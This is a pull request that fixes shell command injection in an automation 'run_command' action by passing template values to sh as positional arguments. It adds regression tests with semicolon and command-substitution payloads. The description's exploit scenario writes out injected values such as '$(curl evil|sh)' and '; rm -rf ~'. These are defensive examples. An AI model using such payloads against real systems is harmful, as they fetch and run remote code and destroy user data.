### PR TITLE
run_command automation action shell-interpolates rendered template output (command injection)

### DIFF
--- a/crates/orbit-engine/src/executor/automation/command/mod.rs
+++ b/crates/orbit-engine/src/executor/automation/command/mod.rs
@@ -8,7 +8,7 @@ use tempfile::tempdir;
 
 use super::StateExecutionContext;
 use crate::context::{EnvironmentHost, RuntimeHost, TaskHost};
-use crate::template::{TemplateContext, render};
+use crate::template::{TemplateContext, render, render_shell_command};
 
 #[derive(Debug, Deserialize)]
 struct RunCommandInput {
@@ -56,7 +56,7 @@ pub(super) fn run_command<H: RuntimeHost + TaskHost + EnvironmentHost + ?Sized>(
         steps: steps_outputs.clone(),
     };
 
-    let command = render(&spec.command, &template_ctx)?;
+    let (command, command_values) = render_shell_command(&spec.command, &template_ctx)?;
     let working_dir = spec
         .working_dir
         .as_deref()
@@ -97,12 +97,13 @@ pub(super) fn run_command<H: RuntimeHost + TaskHost + EnvironmentHost + ?Sized>(
         );
     }
 
+    let mut shell_args = vec!["-lc".to_string(), command, "orbit-run-command".to_string()];
+    shell_args.extend(command_values);
+
     let exec_result = run_process(
         &ExecRequest {
-            // `command` is documented as a shell command string, so execute it
-            // through a shell instead of treating the full string as argv[0].
             program: "sh".to_string(),
-            args: vec!["-lc".to_string(), command],
+            args: shell_args,
             current_dir: working_dir,
             timeout_ms: Some(spec.timeout_seconds.saturating_mul(1000)),
             stdin_mode: StdinMode::Null,
@@ -123,3 +124,6 @@ pub(super) fn run_command<H: RuntimeHost + TaskHost + EnvironmentHost + ?Sized>(
 
     Ok(json!({ "exit_code": exit_code }))
 }
+
+#[cfg(test)]
+mod tests;

--- a/crates/orbit-engine/src/executor/automation/command/tests/mod.rs
+++ b/crates/orbit-engine/src/executor/automation/command/tests/mod.rs
@@ -1,0 +1,256 @@
+#![allow(missing_docs)]
+
+use std::collections::HashMap;
+use std::path::Path;
+
+use orbit_common::types::{
+    Activity, Job, JobTargetType, OrbitError, OrbitEvent, Role, Task, TaskArtifact, TaskPriority,
+    TaskStatus,
+};
+use orbit_tools::ToolContext;
+use serde_json::{Value, json};
+use tempfile::TempDir;
+
+use crate::context::{
+    EnvironmentHost, JobRunResult, RuntimeHost, TaskActivityUpdate, TaskAutomationUpdate,
+    TaskReadHost, TaskWriteHost,
+};
+use crate::executor::registry::ActivityExecutorRegistry;
+
+struct CommandTestHost {
+    data_root: TempDir,
+    scoreboard_dir: TempDir,
+    registry: ActivityExecutorRegistry,
+}
+
+impl CommandTestHost {
+    fn new() -> Self {
+        Self {
+            data_root: tempfile::tempdir().expect("create data root"),
+            scoreboard_dir: tempfile::tempdir().expect("create scoreboard dir"),
+            registry: ActivityExecutorRegistry::default(),
+        }
+    }
+}
+
+impl EnvironmentHost for CommandTestHost {
+    fn agent_provider_config(&self) -> HashMap<String, String> {
+        HashMap::new()
+    }
+
+    fn execution_env_inherit(&self) -> bool {
+        false
+    }
+
+    fn hydrated_env_allowlist(&self, _env_extra: &[String]) -> Vec<(String, String)> {
+        Vec::new()
+    }
+
+    fn orbit_root(&self) -> Option<String> {
+        None
+    }
+
+    fn cli_command_environment(&self, _env_extra: &[String]) -> Vec<(String, String)> {
+        Vec::new()
+    }
+
+    fn missing_required_environment_vars(&self, _required_env_vars: &[&str]) -> Vec<String> {
+        Vec::new()
+    }
+}
+
+impl RuntimeHost for CommandTestHost {
+    fn record_event(&self, _event: OrbitEvent) -> Result<(), OrbitError> {
+        Ok(())
+    }
+
+    fn repo_root(&self) -> Result<String, OrbitError> {
+        Ok(self.data_root.path().to_string_lossy().into_owned())
+    }
+
+    fn data_root(&self) -> &Path {
+        self.data_root.path()
+    }
+
+    fn activity_executor_registry(&self) -> &ActivityExecutorRegistry {
+        &self.registry
+    }
+
+    fn run_job_now_with_input_debug(
+        &self,
+        _job_id: &str,
+        _input: Value,
+        _debug: bool,
+    ) -> Result<JobRunResult, OrbitError> {
+        Err(OrbitError::Execution(
+            "run_job_now_with_input_debug is not needed by command tests".to_string(),
+        ))
+    }
+
+    fn validate_activity_target_exists(
+        &self,
+        _target_type: JobTargetType,
+        _target_id: &str,
+    ) -> Result<Activity, OrbitError> {
+        Err(OrbitError::Execution(
+            "validate_activity_target_exists is not needed by command tests".to_string(),
+        ))
+    }
+
+    fn get_job(&self, _job_id: &str) -> Result<Option<Job>, OrbitError> {
+        Ok(None)
+    }
+
+    fn run_tool_with_context_and_role(
+        &self,
+        _name: &str,
+        _input: Value,
+        _role: Role,
+        _tool_context: ToolContext,
+    ) -> Result<Value, OrbitError> {
+        Err(OrbitError::Execution(
+            "run_tool_with_context_and_role is not needed by command tests".to_string(),
+        ))
+    }
+
+    fn maybe_create_failure_task(
+        &self,
+        _job_id: &str,
+        _run_id: &str,
+        _error_code: &str,
+        _error_message: &str,
+        _agent: Option<&str>,
+        _model: Option<&str>,
+    ) -> Result<(), OrbitError> {
+        Ok(())
+    }
+
+    fn scoring_enabled(&self) -> bool {
+        false
+    }
+
+    fn graph_editing(&self) -> bool {
+        false
+    }
+
+    fn scoreboard_dir(&self) -> &Path {
+        self.scoreboard_dir.path()
+    }
+}
+
+impl TaskReadHost for CommandTestHost {
+    fn get_task(&self, task_id: &str) -> Result<Task, OrbitError> {
+        Err(OrbitError::Execution(format!(
+            "get_task is not needed by command tests for '{task_id}'"
+        )))
+    }
+
+    fn get_task_artifacts(&self, _task_id: &str) -> Result<Vec<TaskArtifact>, OrbitError> {
+        Ok(Vec::new())
+    }
+
+    fn list_tasks_filtered(
+        &self,
+        _status: Option<TaskStatus>,
+        _priority: Option<TaskPriority>,
+        _parent_id: Option<&str>,
+        _job_run_id: Option<&str>,
+        _external_ref: Option<&orbit_common::types::ExternalRef>,
+        _has_external_ref_system: Option<&str>,
+    ) -> Result<Vec<Task>, OrbitError> {
+        Ok(Vec::new())
+    }
+}
+
+impl TaskWriteHost for CommandTestHost {
+    fn start_task(
+        &self,
+        _task_id: &str,
+        _note: Option<String>,
+        _comment: Option<String>,
+    ) -> Result<Task, OrbitError> {
+        Err(OrbitError::Execution(
+            "start_task is not needed by command tests".to_string(),
+        ))
+    }
+
+    fn admit_task_for_workflow(&self, _task_id: &str, _workflow: &str) -> Result<Task, OrbitError> {
+        Err(OrbitError::Execution(
+            "admit_task_for_workflow is not needed by command tests".to_string(),
+        ))
+    }
+
+    fn update_task_from_activity(
+        &self,
+        _task_id: &str,
+        _update: TaskActivityUpdate,
+    ) -> Result<Task, OrbitError> {
+        Err(OrbitError::Execution(
+            "update_task_from_activity is not needed by command tests".to_string(),
+        ))
+    }
+
+    fn apply_task_automation_update(
+        &self,
+        _task_id: &str,
+        _update: TaskAutomationUpdate,
+    ) -> Result<(), OrbitError> {
+        Err(OrbitError::Execution(
+            "apply_task_automation_update is not needed by command tests".to_string(),
+        ))
+    }
+}
+
+#[test]
+fn templated_semicolon_payload_is_not_executed_by_shell() {
+    let host = CommandTestHost::new();
+    let sentinel = host.data_root().join("pwned-by-template");
+    let payload = format!("safe; touch {}", sentinel.to_string_lossy());
+    let input = json!({
+        "command": "printf '%s\\n' {{ input.title }}",
+        "title": payload,
+    });
+
+    let result =
+        super::run_command(&host, &input, &HashMap::new(), None).expect("run_command succeeds");
+
+    assert_eq!(result, json!({ "exit_code": 0 }));
+    assert!(
+        !sentinel.exists(),
+        "template value was re-parsed as shell syntax"
+    );
+}
+
+#[test]
+fn templated_command_substitution_payload_is_not_executed_by_shell() {
+    let host = CommandTestHost::new();
+    let sentinel = host.data_root().join("pwned-by-command-substitution");
+    let payload = format!("$(touch {})", sentinel.to_string_lossy());
+    let input = json!({
+        "command": "printf '%s\\n' {{ input.title }}",
+        "title": payload,
+    });
+
+    let result =
+        super::run_command(&host, &input, &HashMap::new(), None).expect("run_command succeeds");
+
+    assert_eq!(result, json!({ "exit_code": 0 }));
+    assert!(
+        !sentinel.exists(),
+        "template value was re-parsed as shell syntax"
+    );
+}
+
+#[test]
+fn single_quoted_template_value_still_substitutes() {
+    let host = CommandTestHost::new();
+    let input = json!({
+        "command": "test '{{ input.title }}' = 'value with spaces'",
+        "title": "value with spaces",
+    });
+
+    let result =
+        super::run_command(&host, &input, &HashMap::new(), None).expect("run_command succeeds");
+
+    assert_eq!(result, json!({ "exit_code": 0 }));
+}

--- a/crates/orbit-engine/src/template.rs
+++ b/crates/orbit-engine/src/template.rs
@@ -15,6 +15,52 @@ pub struct TemplateContext {
 }
 
 pub fn render(template: &str, ctx: &TemplateContext) -> Result<String, OrbitError> {
+    render_with_tokens(template, ctx, |output, value| {
+        output.push_str(value);
+    })
+}
+
+/// Render a shell command while passing template values as positional argv.
+///
+/// The returned command string contains shell parameter references (`${1}`,
+/// `${2}`, ...) and the returned vector contains the corresponding values.
+pub fn render_shell_command(
+    template: &str,
+    ctx: &TemplateContext,
+) -> Result<(String, Vec<String>), OrbitError> {
+    let mut output = String::with_capacity(template.len());
+    let mut remaining = template;
+    let mut values = Vec::new();
+    let mut quote_state = ShellQuoteState::Unquoted;
+
+    while let Some(start) = remaining.find("{{") {
+        let literal = &remaining[..start];
+        output.push_str(literal);
+        quote_state = advance_shell_quote_state(quote_state, literal);
+
+        let after_start = &remaining[start + 2..];
+        let end = after_start.find("}}").ok_or_else(|| {
+            OrbitError::InvalidInput(format!("unterminated template token in '{template}'"))
+        })?;
+        let token = after_start[..end].trim();
+        let value = resolve_token(token, ctx)?;
+        values.push(value.to_string());
+        push_shell_positional(&mut output, values.len(), quote_state);
+        remaining = &after_start[end + 2..];
+    }
+
+    output.push_str(remaining);
+    Ok((output, values))
+}
+
+fn render_with_tokens<F>(
+    template: &str,
+    ctx: &TemplateContext,
+    mut write_token: F,
+) -> Result<String, OrbitError>
+where
+    F: FnMut(&mut String, &str),
+{
     let mut output = String::with_capacity(template.len());
     let mut remaining = template;
 
@@ -25,12 +71,69 @@ pub fn render(template: &str, ctx: &TemplateContext) -> Result<String, OrbitErro
             OrbitError::InvalidInput(format!("unterminated template token in '{template}'"))
         })?;
         let token = after_start[..end].trim();
-        output.push_str(&resolve_token(token, ctx)?);
+        let value = resolve_token(token, ctx)?;
+        write_token(&mut output, &value);
         remaining = &after_start[end + 2..];
     }
 
     output.push_str(remaining);
     Ok(output)
+}
+
+#[derive(Clone, Copy)]
+enum ShellQuoteState {
+    Unquoted,
+    Single,
+    Double,
+}
+
+fn push_shell_positional(output: &mut String, index: usize, quote_state: ShellQuoteState) {
+    match quote_state {
+        ShellQuoteState::Unquoted => {
+            output.push_str("\"${");
+            output.push_str(&index.to_string());
+            output.push_str("}\"");
+        }
+        ShellQuoteState::Single => {
+            output.push_str("'\"${");
+            output.push_str(&index.to_string());
+            output.push_str("}\"'");
+        }
+        ShellQuoteState::Double => {
+            output.push_str("${");
+            output.push_str(&index.to_string());
+            output.push('}');
+        }
+    }
+}
+
+fn advance_shell_quote_state(mut state: ShellQuoteState, literal: &str) -> ShellQuoteState {
+    let mut chars = literal.chars();
+    while let Some(ch) = chars.next() {
+        match state {
+            ShellQuoteState::Unquoted => match ch {
+                '\\' => {
+                    let _ = chars.next();
+                }
+                '\'' => state = ShellQuoteState::Single,
+                '"' => state = ShellQuoteState::Double,
+                _ => {}
+            },
+            ShellQuoteState::Single => {
+                if ch == '\'' {
+                    state = ShellQuoteState::Unquoted;
+                }
+            }
+            ShellQuoteState::Double => match ch {
+                '\\' => {
+                    let _ = chars.next();
+                }
+                '"' => state = ShellQuoteState::Unquoted,
+                _ => {}
+            },
+        }
+    }
+    state
 }
 
 fn resolve_token(token: &str, ctx: &TemplateContext) -> Result<String, OrbitError> {


### PR DESCRIPTION
## Task

[ORB-00364](https://orbit-cli.com/tasks/ORB-00364) — run_command automation action shell-interpolates rendered template output (command injection)

### Description

## Problem
run_command renders the spec's command string through the simple string-substitution template engine (render) and then executes it as a shell command line: program "sh", args ["-lc", command] via run_process. The template engine performs raw, unescaped substitution of values from input, item, env, and prior steps.*.output into the string — it is not a sandboxed/auto-escaping engine. Any template token whose resolved value contains shell metacharacters (;, $(), backticks, |, newline) is interpreted by sh -lc. Those values can include attacker-influenced data: job/activity input fields, fan-out item values, and accumulated outputs of earlier steps (which can include tool/agent/subprocess output, subject to prompt injection). The command template string itself is operator-authored (trusted); the vulnerability is that the interpolated values are not escaped or treated as untrusted. The v2 cli_command executor renders into argv arrays so it avoids full shell injection (only the program name is a redirection risk there).

## Why It Matters / Exploit Scenario
A workflow uses run_command with command like `echo {{ input.title }} >> log` or templates a value from {{ steps.previous.output.x }}. An attacker controlling the upstream field — a task title, a fan-out item derived from repo contents, or an agent/tool output captured into a prior step — supplies `$(curl evil|sh)` or `; rm -rf ~`, which sh -lc executes in the engine's process environment with no sandbox. Combined with the workspace-override finding, the attacker controls both the activity and the input.

## Remediation
Avoid sh -lc for templated commands. Take program + args[] separately and exec via argv (no shell), as the v2 cli_command path does, so interpolated values are never re-parsed by a shell. If a shell is genuinely required, forbid template tokens in the command string or shell-quote each substituted value, and treat step/agent/task outputs as untrusted.

## Affected Locations
- `crates/orbit-engine/src/executor/automation/command/mod.rs:59`
- `crates/orbit-engine/src/executor/automation/command/mod.rs:104`
- `crates/orbit-engine/src/template.rs:127`

## Metadata
- **Severity:** Medium
- **CWE:** CWE-78
- **Surface:** orbit-engine v1 automation action run_command
- **Source:** Automated multi-agent security audit (2026-06-06), double-verified (2 independent adversarial reviewers confirmed exploitability + technical correctness).

### Acceptance Criteria

- The run_command automation action no longer passes templated/untrusted values into `sh -lc`; values are passed as explicit argv elements (no shell re-parse), or each substituted value is strictly shell-quoted at render time.
- A test in the sibling tests/ dir asserts that a template value containing `; touch /tmp/pwned` (or `$(...)`) does NOT result in shell execution of the injected payload.
- make ci-fast passes.

## Execution Summary

<details>
<summary>Click to expand</summary>

Outcome: success

Changes:
- Added a shell-command template renderer that rewrites each template token to a positional-parameter reference while returning the resolved values separately. It handles unquoted, double-quoted, and single-quoted template positions.
- Updated run_command to invoke sh with the trusted rendered command string plus template values as explicit argv elements, so injected shell metacharacters are not re-parsed.
- Added sibling command tests covering semicolon and command-substitution payloads, plus a quoted-token substitution regression.

Assessment: The scoped security fix is implemented and validated with focused regression tests plus make ci-fast.

</details>

## Validation

- Not reported

## Branch Freshness

- Base ref: `origin/agent-main`
- Head ref: `orbit/ORB-00364-6a2cafba`
- Behind base: 0
- Ahead of base: 1